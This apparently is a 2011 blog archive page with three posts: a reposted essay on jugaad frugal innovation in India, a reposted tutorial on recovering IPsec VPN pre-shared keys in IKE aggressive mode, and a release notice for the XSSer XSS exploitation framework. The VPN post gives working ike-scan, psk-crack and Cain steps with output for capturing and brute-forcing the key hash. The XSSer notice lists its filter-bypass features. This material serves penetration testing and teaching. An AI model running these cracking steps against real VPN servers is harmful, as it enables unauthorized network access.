Friday, December 9, 2011

Use Jugaad to Innovate Faster, Cheaper, Better

This is not a techie post, but I just loved what the post author had to say. A grand shout out to Jugaad innovators.

We recently attended the World Economic Forum's India Economic Summit 2011 in Mumbai, where we moderated several panels and workshops on the topic of innovation. The experience gave us some insights into a unique approach to innovation called jugaad, which entrepreneurs and enterprises are practicing in complex emerging markets like India.

Jugaad is a Hindi word that loosely translates as "the gutsy art of overcoming harsh constraints by improvising an effective solution using limited resources." Jugaad is an antidote to the complexity of India: a country of mind-blogging diversity; pervasive scarcity of all kinds; and exploding interconnectivity (India is adding 10 million cellphone subscribers every month).

This highly resource-constrained and chaotic environment inspires jugaad innovators — i.e., the Indian entrepreneurs and corporations who practice jugaad to develop market-relevant products and services that are inherently affordable and sustainable. Jugaad innovators are modern-day alchemists who transmute adversity into opportunity, and in so doing create value for their organizations and communities. And while we first learned about jugaad while conducting field research in India over the past several years, we've found that jugaad innovators exist around the world, including right here in the U.S.

There are three aspects of jugaad that make it particularly effective. Specifically:

Jugaad innovators innovate faster: Jugaad innovators don't use linear, pre-planned, time-consuming R&D processes. Rather, they rely heavily on rapid prototyping techniques — i.e., they collaborate intimately with customers and use their constant feedback to zero in on the most relevant product features. For instance, Jane Chen and Rahul Panicker, Stanford graduates and co-founders of Embrace, worked closely with village pediatricians and patients in rural India to iteratively optimize the design of their breakthrough portable infant warmer — which costs less than 5% of incubators sold in the West (which are typically priced around $20,000).

Jugaad innovators innovate cheaper: Jugaad innovators are very frugal. Rather than reinventing the wheel or splurging on expensive R&D projects, they develop new solutions by building upon existing infrastructure and assets, as well as by recombining existing solutions. In doing so, they can pass the cost savings on to their customers. For instance, YES Bank, one of India's leading private banks, has deployed a mobile payment solution that enables money transfer via cellphones without the need for a bank account. This solution piggybacks on India's existing robust mobile telephony infrastructure that extends to the remotest of villages in India (a country where nearly 870 million people have cellphones, but 600 million or so do not have a bank account).

Jugaad innovators innovate better: Jugaad innovators recognize that consumers in emerging markets are low earners, but high yearners. As such, jugaad innovators attempt to meet customers' high aspirations by developing solutions that are not only affordable, but that also deliver superior value. In sum, they strive to deliver more (value) for less (cost). Take, for instance, SELCO, an Indian renewable energy firm founded by the U.S.-educated Harish Hande. Recognizing the diverse needs of the Indian rural population, SELCO set out to personalize the value proposition of its solar lanterns to individual customers — be they a village midwife who doesn't want the toxic fumes of a kerosene lamp polluting her patient's environment; a rosebud collector looking for a modular lighting solution that can be repaired quickly in a remote location; or a vegetable seller who doesn't want to contend with the electrical outages that are typical across India. As a result, more than 115,000 rural customers now use SELCO's solar lanterns — not only because they are affordable, but because they deliver superior value by addressing customers' unique needs.

What makes jugaad innovators so adept at innovating faster, cheaper, and better? The answer lies in their unique mindset — characterized by two key attributes: adaptability and inclusivity.

Jugaad innovators are highly adaptable: Indian entrepreneurs who practice jugaad are a resilient bunch: they continually find ways to bounce back from the adversity that permeates every aspect of their lives. Jugaad innovators sense and respond to rapid changes in their environment by dynamically reinventing their business models. For instance, Chen and Panicker, co-founders of Embrace, initially set out to design a fixed incubator at a low-cost — but once they discovered that Indian village women preferred to hold their newborn babies close to their bodies, they quickly adapted their business model around a portable infant warmer.

Jugaad innovators are inclusive: In India, more than 800 million citizens lack access to healthcare, 600 million are unbanked, and 400 million live off the electricity grid. While most corporations view these marginal segments as being unprofitable, jugaad innovators like YES Bank's Rana Kapoor and SELCO's Harish Hande have invented inclusive business models for profitably serving the millions who live on the margins of society. For these entrepreneurs, including the margin not only provides for greater social good, it also makes great business sense.

Interestingly, we have noticed that jugaad is practiced not only by Indian entrepreneurs and corporations, but also by some pioneering multinationals in India. Take GE Healthcare, for instance,which used the flexible jugaad mindset to make high-quality cancer diagnosis and treatment accessible to underdeveloped communities across India. Until recently, India had been importing the radioisotopes required for nuclear imaging such as PET/CT scans. This was not only unaffordable for many rural hospitals, it was ineffective because the radioisotopes decay over time (in hours or even minutes), so they need to be administered to the patient soon after they're produced. GE Healthcare partnered with private diagnostic centers and airline companies to locally produce radioisotopes — and make deliveries on a just-in-time basis to small-town hospitals around the country. Now, with GE Healthcare's frugal "pay-per-use" pricing model and just-in-time delivery mechanism, the supply of radioisotopes has become affordable and dependable for many rural hospitals.

The jugaad mindset — and its associated principles and practices — is increasingly relevant for companies worldwide who are seeking to grow in an increasingly complex and resource-constrained business environment. Unlike traditional, structured innovation methods that rely on time-consuming and expensive R&D processes, the more fluid jugaad approach delivers speed, agility, and cost efficiencies. Jugaad is a "bottom up" innovation approach that provides organizations in both emerging and developed economies the key capabilities they need to succeed in a hypercompetitive and fast-moving world: frugality, inclusivity, collaboration, and adaptability.

Aggressive Mode VPN -- IKE-Scan, PSK-Crack, and Cain

Carnal0wnange blog has this nice article about hacking into IPSEC tunnels in aggressive mode.


There hasn't been much in the way of updates on breaking into VPN servers that have aggressive mode enabled.

ike-scan is probably still your best bet.

If you have no idea what i'm talking about go read this:
http://www.sersc.org/journals/IJAST/vol8/2.pdf and
http://www.radarhack.com/dir/papers/Scanning_ike_with_ikescan.pdf

In IKE Aggressive mode the authentication hash based on a preshared key (PSK) is transmitted as response to the initial packet of a vpn client that wants to establish an IPSec Tunnel (Hash_R). This hash is not encrypted. It's possible to capture these packets using a sniffer, for example tcpdump and start dictionary or brute force attack against this hash to recover the PSK.

This attack only works in IKE aggressive mode because in IKE Main Mode the hash is already encrypted. Based on such facts IKE aggressive mode is not very secure.

It looks like this:
$ sudo ike-scan 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ike-scan/)

192.168.207.134 Notify message 14 (NO-PROPOSAL-CHOSEN) HDR=(CKY-R=f320d682d5c73797)
Ending ike-scan 1.9: 1 hosts scanned in 0.096 seconds (10.37 hosts/sec).
0 returned handshake; 1 returned notify

$ sudo ike-scan -A 192.168.207.134
Starting ike-scan 1.9 with 1 hosts (http://www.nta-monitor.com/tools/ikescan/)

192.168.207.134 Aggressive Mode Handshake returned HDR=(CKY-R=f320d6XXXXXXXX) SA=(Enc=3DES Hash=MD5 Group=2:modp1024 Auth=PSK LifeType=Seconds LifeDuration=28800) VID=12f5f28cXXXXXXXXXXXXXXX (Cisco Unity) VID=afcad71368a1XXXXXXXXXXXXXXX(Dead Peer Detection v1.0) VID=06e7719XXXXXXXXXXXXXXXXXXXXXX VID=090026XXXXXXXXXX (XAUTH) KeyExchange(128 bytes) ID(Type=ID_IPV4_ADDR, Value=192.168.207.134) Nonce(20 bytes) Hash(16 bytes)
To save with some output:
$ sudo ike-scan -A 192.168.207.134 --id=myid -P192-168-207-134key
Once you have you psk file to crack you're stuck with two options psk-crack and cain

psk-crack is fairly rudamentary

to brute force:

$psk-crack -b 5 192-168-207-134key
Running in brute-force cracking mode
Brute force with 36 chars up to length 5 will take up to 60466176 iterations

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 60466176 iterations in 138.019 seconds (438099.56 iterations/sec)
Default is charset is "0123456789abcdefghijklmnopqrstuvwxyz" can be changed with --charset=
$ psk-crack -b 5 --charset="01233456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" 192-168-207-134key
Running in brute-force cracking modde
Brute force with 63 chars up to length 5 will take up to 992436543 iterations
To dictionary attack:

$psk-crack -d /path/to/dictionary 192-168-207-134key
Running in dictionary cracking mode

no match found for MD5 hash 5c178d[SNIP]
Ending psk-crack: 14344876 iterations in 33.400 seconds (429483.14 iterations/sec)
You may find yourself wanting a bit more flexibility or options during bruteforcing or dictionary attacking (i.e. character substition). For this you'll need to use Cain. The problem I ran in to was Cain is a Windows tool and ike-scan is *nix. I couldnt get the windows tool that is floating around to work. Solution...run in vmware and have Cain sniff on your VMware interface. The PSK should show up in passwords of the sniffer tab, then you can select and "send to cracker". Its slow as hell, but more options than psk-crack.


Thursday, December 1, 2011

XSSer v.1.6 BETA Released

Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based applications.It contains several options to try to bypass certain filters, and various special techniques of code injection.


Changelog:


Core: Added Drop Cookie option + Added Random IP X-Forwarded-For an X-Client-IP option + Added GSS and NTLM authentication methods + Added Ignore proxy option + Added TCP-NODELAY option + Added Follow redirects option + Added Follow redirects limiter parameter + Added Auto-HEAD precheck system + Added No-HEAD option + Added Isalive option + Added Check at url option (Blind XSS) + Added Reverse Check parameter + Added PHPIDS (v.0.6.5) exploit + Added More vectors to auto-payloading + Added HTML5 studied vectors + Fixed Different bugs on core + Fixed Curl handlerer options + Fixed Dorkerers system + Fixed Bugs on results propagation + Fixed POST requests. GTK: Added New features to GTK controller + Added Detailed views to GTK interface


Download: http://xsser.sourceforge.net